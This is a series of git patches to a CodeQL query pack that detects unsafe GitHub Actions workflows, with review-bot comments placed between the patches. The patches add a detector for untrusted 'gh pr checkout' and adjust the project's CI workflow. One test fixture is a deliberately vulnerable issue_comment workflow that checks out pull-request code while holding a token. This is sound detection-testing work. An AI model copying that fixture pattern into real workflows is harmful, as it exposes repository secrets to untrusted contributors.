@@ -121,6 +122,24 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhCheckout extends PRHeadCheckoutStep instanceof Run { + GhCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + ( + containsHeadRef(line) + or + exists(string varname | + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + from Workflow w, PRHeadCheckoutStep checkout where w.isPrivileged() and diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml new file mode 100644 index 000000000000..d9e5d6be6707 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -0,0 +1,19 @@ +on: issue_comment + +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Get PR number + id: pr_number + if: ${{ github.event_name == 'issue_comment'}} + run: | + PR_URL="${{ github.event.issue.pull_request.url }}" + PR_NUMBER=${PR_URL##*/} + echo "number=$PR_NUMBER" >> $GITHUB_OUTPUT + - name: Checkout Pull Request + if: github.event_name == 'issue_comment' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} From afaab8b644e8b99a1d78f278afd7760a2b2f575a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:26:21 +0200 Subject: [PATCH 180/707] add tests --- ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index dc457c6a8a7a..27f6bbca39ce 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
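Review bot: In `GhCheckout`, `exists(line.regexpFind(varname, _, _))` treats the environment variable name as a regular expression and matches it as a bare substring, so a variable named `PR` is found inside `PR_URL`, and a name containing regex metacharacters would presumably be interpreted rather than compared literally. Anchoring on word boundaries avoids both while still matching `$PR_NUMBER` and `${PR_NUMBER}`: `exists(line.regexpFind("\\b" + varname + "\\b", _, _))`. The class also only inspects the lines of a single Run script, so a checkout whose argument was assigned earlier in the same script (rather than via `env`) is not covered; that is acceptable for a heuristic but deserves a sentence in the QLDoc above the class.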
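Review bot: The fixture's `gh pr checkout ${{ needs.should_run_it.outputs.pr_number }}` references a job that does not exist in the file, while the preceding step exposes the value as `steps.pr_number.outputs.number`, so the new alert is produced only by the `\bpr_number\b` heuristic rather than by a reference the workflow could resolve. Using `gh pr checkout ${{ steps.pr_number.outputs.number }}` makes the fixture self-consistent and, since `pr_number` still appears as a word, should still exercise the heuristic. The `echo "number=$PR_NUMBER" >> $GITHUB_OUTPUT` line would also be cleaner with `"$GITHUB_OUTPUT"` quoted.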
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -18,6 +18,7 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From d4d3957392a16149b6b7e59a9d66e022439d8f84 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:29:14 +0200 Subject: [PATCH 181/707] Create test.yml --- .github/workflows/test.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .github/workflows/test.yml diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml new file mode 100644 index 000000000000..8d24f44ed320 --- /dev/null +++ b/.github/workflows/test.yml @@ -0,0 +1,14 @@ +name: Tests +on: + push: + pull_request: + +permissions: {} + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - run: | + codeql test run ql/test From 86cc50971b00ee7444bb6d13cc9483d3ed38480a Mon Sep 17 00:00:00 2001 
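Review bot: `actions/checkout@v3` is referenced by a mutable tag, whereas later patches in this series pin `github/codeql-action/init` to a full commit SHA; pinning the checkout action the same way keeps the workflow's supply chain consistent, e.g. `- uses: actions/checkout@<commit-sha> # v3` with the SHA of the v3 release. The `permissions: {}` block is the right default for a job that only runs `codeql test run`.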
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:30:15 +0200 Subject: [PATCH 182/707] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8d24f44ed320..bbd894057bcb 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -2,6 +2,7 @@ name: Tests on: push: pull_request: + workflow_dispatch: permissions: {} From a29e0c438d6fe730700769a99138c737344ff185 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:38:27 +0200 Subject: [PATCH 183/707] Update test.yml --- .github/workflows/test.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index bbd894057bcb..e50408349851 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -11,5 +11,9 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 + - run: | codeql test run ql/test From a4cf78b9ed6bcc7d08311e4aebd565480b1b2205 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:43:20 +0200 Subject: [PATCH 184/707] Update test.yml --- .github/workflows/test.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index e50408349851..6e190ff96124 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -4,15 +4,13 @@ on: pull_request: workflow_dispatch: -permissions: {} - jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 with: - token: ${{ secrets.BUGHALLA_TOKEN }} + token: ${{ secrets.SECLAB_TOKEN }} fetch-depth: 0 - run: | From bd4f158b22ebcc90cc6e42d7a3c95e879b03a7ad Mon Sep 17 00:00:00 2001 
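Review bot: Dropping `permissions: {}` restores the default `GITHUB_TOKEN` permission set for a workflow that also runs on `pull_request`, which is broader than a test job needs; if the block was removed because a later step needs the token, a minimal grant such as `permissions:` followed by `contents: read` is preferable to no block at all. Passing `secrets.SECLAB_TOKEN` to checkout also leaves the PAT in the checkout's git config for the rest of the job unless `persist-credentials: false` is set, and the `codeql test run` step that follows does not appear to need it. Both points apply equally to the preceding patch that introduced `BUGHALLA_TOKEN` in the same place.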
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:48:40 +0200 Subject: [PATCH 185/707] Update test.yml --- .github/workflows/test.yml | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 6e190ff96124..a0dc2688ce2a 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,9 +9,22 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 with: - token: ${{ secrets.SECLAB_TOKEN }} - fetch-depth: 0 - + languages: javascript # does not matter + - name: Initialize CodeQL + id: init + run: | + # Take the most modern version + VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ + | sort \ + | tail -n 1 \ + | tr -d '\n')" + + CODEQL="$VERSION/x64/codeql/" + "${CODEQL}"/codeql version --format=json + echo "${CODEQL}" >> $GITHUB_PATH - run: | codeql test run ql/test From 591dfe07fefd261a0110adc17dce77bdbb9627fc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:55:09 +0200 Subject: [PATCH 186/707] Update copy-to-bughalla.yml --- .github/workflows/copy-to-bughalla.yml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 9e0fee9a0f7e..0384660acc11 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -10,10 +10,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - with: - token: ${{ secrets.BUGHALLA_TOKEN }} - fetch-depth: 0 - - run: | rm -rf .github/workflows/copy-to-bughalla.yml git remote set-url --push origin git@github.com:bughalla/codeql-actions 
@@ -28,4 +24,4 @@ jobs: repository: bughalla/codeql-actions github_token: ${{ secrets.BUGHALLA_TOKEN }} branch: ${{ github.ref }} - force: true \ No newline at end of file + force: true From 5d5a02ccc34aeefdbefa78ffa673a6300d593e11 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 22:02:04 +0200 Subject: [PATCH 187/707] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index a0dc2688ce2a..4aeed100c801 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,4 +27,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/lib codeql test run ql/test From d69c10c4f6f57cc3a2793ae8c6eb676d99dcabd2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 09:40:44 +0200 Subject: [PATCH 188/707] Update test.yml --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 4aeed100c801..245baea46679 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,5 +27,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | - codeql pack install ql/lib + codeql pack download ql/lib codeql test run ql/test From c681b13046ad5379fcb7a8e8e748ea3487c7b236 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 19 Apr 2024 09:55:12 +0200 Subject: [PATCH 189/707] Update copy-to-bughalla.yml --- .github/workflows/copy-to-bughalla.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 0384660acc11..572d987ce377 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml 
@@ -10,6 +10,10 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 + - run: | rm -rf .github/workflows/copy-to-bughalla.yml git remote set-url --push origin git@github.com:bughalla/codeql-actions From 6bc0d6dc32ec9f20a541ded7ecd4cce3b70b701c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 09:59:15 +0200 Subject: [PATCH 190/707] Update test.yml --- .github/workflows/test.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 245baea46679..227b834f0395 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,11 +9,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Find codeql - id: find-codeql - uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 - with: - languages: javascript # does not matter - name: Initialize CodeQL id: init run: | From 8c8a9b8a189d83c077687a1fe5db0d46614b96bb Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 19 Apr 2024 10:01:55 +0200 Subject: [PATCH 191/707] Update test.yml --- .github/workflows/test.yml | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 227b834f0395..893934079485 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml 
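Review bot: The `token: ${{ secrets.BUGHALLA_TOKEN }}` given to `actions/checkout@v4` is stored in the checkout's `.git/config` for the remainder of the job by default, and the job's later step already receives the same secret via `github_token`; if the push is performed by that step rather than by the `git` commands in this run block, adding `persist-credentials: false` under `with:` limits how long the PAT is exposed on the runner. `fetch-depth: 0` is needed for a full-history mirror, so that part looks intentional. The workflow's trigger is outside the hunk, so whether untrusted inputs reach this job cannot be judged here.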
@@ -9,18 +9,11 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Initialize CodeQL - id: init - run: | - # Take the most modern version - VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ - | sort \ - | tail -n 1 \ - | tr -d '\n')" - - CODEQL="$VERSION/x64/codeql/" - "${CODEQL}"/codeql version --format=json - echo "${CODEQL}" >> $GITHUB_PATH + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 + with: + languages: javascript # does not matter - run: | codeql pack download ql/lib codeql test run ql/test From 5190e0865cdfcd57fc6d62c61aeca8d4d3da16e7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 10:29:12 +0200 Subject: [PATCH 192/707] Update test.yml --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 893934079485..5efa1ae3dae9 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -5,7 +5,7 @@ on: workflow_dispatch: jobs: - build: + tests: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From e200746678e0bf2a7944f919d4817ebf46ab1f2a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:31:22 +0200 Subject: [PATCH 193/707] remove qlpack locks from repo --- .gitignore | 3 ++- ql/src/codeql-pack.lock.yml | 16 ---------------- ql/test/codeql-pack.lock.yml | 16 ---------------- 3 files changed, 2 insertions(+), 33 deletions(-) delete mode 100644 ql/src/codeql-pack.lock.yml delete mode 100644 ql/test/codeql-pack.lock.yml diff --git a/.gitignore b/.gitignore index 4ba9d315acc7..b874cdb64cea 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,8 @@ .DS_Store **/*.testproj +**/codeql-pack.lock.yml ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ db/ -.cache \ No newline at end of file +.cache 
diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml
deleted file mode 100644
index 56f10b81e0c7..000000000000
--- a/ql/src/codeql-pack.lock.yml
+++ /dev/null
@@ -1,16 +0,0 @@
----
-lockVersion: 1.0.0
-dependencies:
- codeql/controlflow:
- version: 0.1.7
- codeql/dataflow:
- version: 0.1.7
- codeql/ssa:
- version: 0.2.7
- codeql/typetracking:
- version: 0.2.7
- codeql/util:
- version: 0.2.7
- codeql/yaml:
- version: 0.2.7
-compiled: false
diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml
deleted file mode 100644
index 8494dea432f7..000000000000
--- a/ql/test/codeql-pack.lock.yml
+++ /dev/null
@@ -1,16 +0,0 @@
----
-lockVersion: 1.0.0
-dependencies:
- codeql/controlflow:
- version: 0.1.8
- codeql/dataflow:
- version: 0.1.8
- codeql/ssa:
- version: 0.2.8
- codeql/typetracking:
- version: 0.2.8
- codeql/util:
- version: 0.2.8
- codeql/yaml:
- version: 0.2.9
-compiled: false
From 96abb193c76193ccf7799fd7acd6dae5b53ae736 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 19 Apr 2024 11:39:03 +0200
Subject: [PATCH 194/707] Update test.yml
---
 .github/workflows/test.yml | 18 ++++++++++++------
 1 file changed, 12 insertions(+), 6 deletions(-)
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
index 5efa1ae3dae9..f8071c2986d9 100644
--- a/.github/workflows/test.yml
+++ b/.github/workflows/test.yml
@@ -9,11 +9,17 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Find codeql - id: find-codeql - uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 - with: - languages: javascript # does not matter + - name: Initialize CodeQL + id: init + run: | + # Take the most modern version + VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ + | sort \ + | tail -n 1 \ + | tr -d '\n')" + + CODEQL="$VERSION/x64/codeql/" + "${CODEQL}"/codeql version --format=json + echo "${CODEQL}" >> $GITHUB_PATH - run: | - codeql pack download ql/lib codeql test run ql/test From 071329400686f658fae6fd54eaf1fbaf696373f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:52:56 +0200 Subject: [PATCH 195/707] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index f8071c2986d9..390b35cd2336 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -22,4 +22,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/test codeql test run ql/test From 417830020df70d6b5e169c948d1fd29669d0be8a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:55:08 +0200 Subject: [PATCH 196/707] Update test.yml --- .github/workflows/test.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 390b35cd2336..51d66e5ee486 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -22,5 +22,7 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/lib + codeql pack install ql/src codeql pack install ql/test codeql test run ql/test From ecf81989844d4ce2f27703b981a0954448afaa59 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:00:02 +0200 Subject: [PATCH 197/707] Update test.yml --- .github/workflows/test.yml | 21 ++++++++++----------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 51d66e5ee486..78808fb82111 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,18 +9,17 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Initialize CodeQL - id: init + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} run: | - # Take the most modern version - VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ - | sort \ - | tail -n 1 \ - | tr -d '\n')" - - CODEQL="$VERSION/x64/codeql/" - "${CODEQL}"/codeql version --format=json - echo "${CODEQL}" >> $GITHUB_PATH + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - run: | codeql pack install ql/lib codeql pack install ql/src From 843d9e24c4c49ec180b6766c573df02fcd4d03ce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:05:09 +0200 Subject: [PATCH 198/707] Update test.yml --- .github/workflows/test.yml | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 78808fb82111..ed4997285c68 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml 
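Review bot: `gh codeql version --format=json | jq -r .unpackedLocation` is executed twice in the `Fetch CodeQL` step, once for `GITHUB_ENV` and once for `GITHUB_PATH`; capturing it once removes the duplicated subprocess and the split `printf`/append into `GITHUB_ENV`: `loc="$(gh codeql version --format=json | jq -r .unpackedLocation)"`, `echo "CODEQL_FETCHED_CODEQL_PATH=${loc}" >> "${GITHUB_ENV}"`, `echo "${loc}" >> "${GITHUB_PATH}"`. Separately, `set-channel "nightly"` combined with an unpinned `gh extension install github/gh-codeql` means each run tests against whatever CLI build was published that day, so a failing run cannot be reproduced later; a short comment stating that tracking nightly is deliberate, or a fixed version if reproducibility matters more, would help the next reader.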
@@ -20,8 +20,17 @@ jobs: printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - - run: | - codeql pack install ql/lib - codeql pack install ql/src - codeql pack install ql/test + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql # to make stubs available for tests + codeql pack download "codeql/actions-queries" + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" + - name: Run Tests + env: + GITHUB_TOKEN: ${{ github.token }} + run: | codeql test run ql/test From a222bfc33d3c3d8b513cd752cdd934b22467e8f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:07:00 +0200 Subject: [PATCH 199/707] Update test.yml --- .github/workflows/test.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index ed4997285c68..8b14b75062a5 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -24,8 +24,7 @@ jobs: env: GITHUB_TOKEN: ${{ github.token }} run: | - gh repo clone github/codeql # to make stubs available for tests - codeql pack download "codeql/actions-queries" + gh repo clone github/codeql codeql pack install "ql/lib" codeql pack install "ql/src" codeql pack install "ql/test" From febba3d6d303da77541c32569e136c36c8a40ba4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:22:20 +0200 Subject: [PATCH 200/707] Update gitignore --- .gitignore | 1 - 1 file changed, 1 deletion(-) diff --git a/.gitignore b/.gitignore index b874cdb64cea..173a5dd5d09f 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,5 @@ .DS_Store **/*.testproj -**/codeql-pack.lock.yml ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ 
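Review bot: `gh repo clone github/codeql` fetches the full history of a very large repository on every run only to make stub packs available; a shallow clone keeps the same layout, `gh repo clone github/codeql -- --depth 1`, where arguments after `--` are passed through to `git clone`. The `codeql pack download "codeql/actions-queries"` line is removed again in the next patch, so I am not commenting on it. The `GITHUB_TOKEN` env on the `Run Tests` step appears unused by `codeql test run`; if it is not needed there, dropping it narrows what that step can do with the token.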
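Review bot: The replacement line `gh repo clone github/codeql` drops the trailing `# to make stubs available for tests` comment, which was the only explanation of why a clone of the main CodeQL repository belongs in a test job; please keep it, e.g. `gh repo clone github/codeql # stubs needed by ql/test`. Without it the clone reads as leftover debugging and is likely to be removed by a future cleanup.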
From 19a87a13db5b6fc67ff1bd9df5891dad996ae783 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:22:58 +0200 Subject: [PATCH 201/707] Update lock files --- ql/lib/codeql-pack.lock.yml | 16 ++++++++++++++++ ql/lib/qlpack.yml | 8 ++++---- ql/src/codeql-pack.lock.yml | 16 ++++++++++++++++ ql/test/codeql-pack.lock.yml | 16 ++++++++++++++++ 4 files changed, 52 insertions(+), 4 deletions(-) create mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/src/codeql-pack.lock.yml create mode 100644 ql/test/codeql-pack.lock.yml diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml new file mode 100644 index 000000000000..84a6ccba26dc --- /dev/null +++ b/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ff8e02aa63e1..64e2861cf688 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.11 dependencies: - codeql/controlflow: "*" - codeql/dataflow: "*" - codeql/util: "*" - codeql/yaml: "*" + codeql/util: ^0.2.0 + codeql/yaml: ^0.1.2 + codeql/controlflow: ^0.1.0 + codeql/dataflow: ^0.1.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml new file mode 100644 index 000000000000..84a6ccba26dc --- /dev/null +++ b/ql/src/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false 
diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml new file mode 100644 index 000000000000..84a6ccba26dc --- /dev/null +++ b/ql/test/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false From cb1e19a3179831f70d3a85e4f50346e795ba9adc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:19:10 +0200 Subject: [PATCH 202/707] New ExpressionIdAlwaysTrue query --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 3 + .../CWE-571/ExpressionIsAlwaysTrue.ql | 24 ++++++++ .../CWE-571/.github/workflows/test.yml | 60 +++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.qlref | 1 + 5 files changed, 90 insertions(+) create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql create mode 100644 ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 7e1bfdee589a..8a3dfb7b2a72 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -332,6 +332,8 @@ class If extends AstNode instanceof IfImpl { string getCondition() { result = super.getCondition() } Expression getConditionExpr() { result = super.getConditionExpr() } + + string getConditionStyle() { result = super.getConditionStyle() } } abstract class Uses extends AstNode instanceof UsesImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a66befe7d7d2..dff5f351a69b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
